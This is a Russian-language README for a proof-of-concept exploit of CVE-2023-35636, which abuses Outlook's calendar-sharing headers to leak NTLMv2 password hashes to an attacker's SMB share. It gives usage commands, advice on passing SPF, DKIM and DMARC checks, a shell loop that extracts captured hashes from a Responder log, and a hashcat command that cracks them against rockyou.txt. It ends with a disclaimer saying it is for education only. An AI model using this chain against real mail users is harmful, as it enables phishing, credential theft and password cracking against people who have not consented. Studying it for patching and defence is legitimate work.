
Уязвимость Microsoft Outlook, приводящая к раскрытию информации (утечка хеша пароля) — PoC-сценарий Expect
Уязвимость Microsoft Outlook, приводящая к раскрытию информации (утечка хэша пароля) - Expect Script POC
CVE-2023-35636 — эксплойт функции общего доступа к календарю в Microsoft Outlook, при котором добавление двух заголовков к электронному письму заставляет Outlook предоставить общий доступ к содержимому и связаться с указанной машиной, создавая возможность перехвата NTLM v2 хэша.

использование: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (не забудьте все \)

примечания: chmod +x cve-2023-35636.sh
требуется приложение expect
требуются легитимные IP-адрес отправителя и адрес электронной почты отправителя (для прохождения SPF, DKIM, DMARC)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
Благодарность: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
Обходной путь / Исправление: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставляется ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его в любой системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям незаконен, и пользователи, уличенные в несанкционированной деятельности, подлежат судебному преследованию. Автор НЕ несет ответственности за любой ущерб, вызванный неправильным использованием этого скрипта.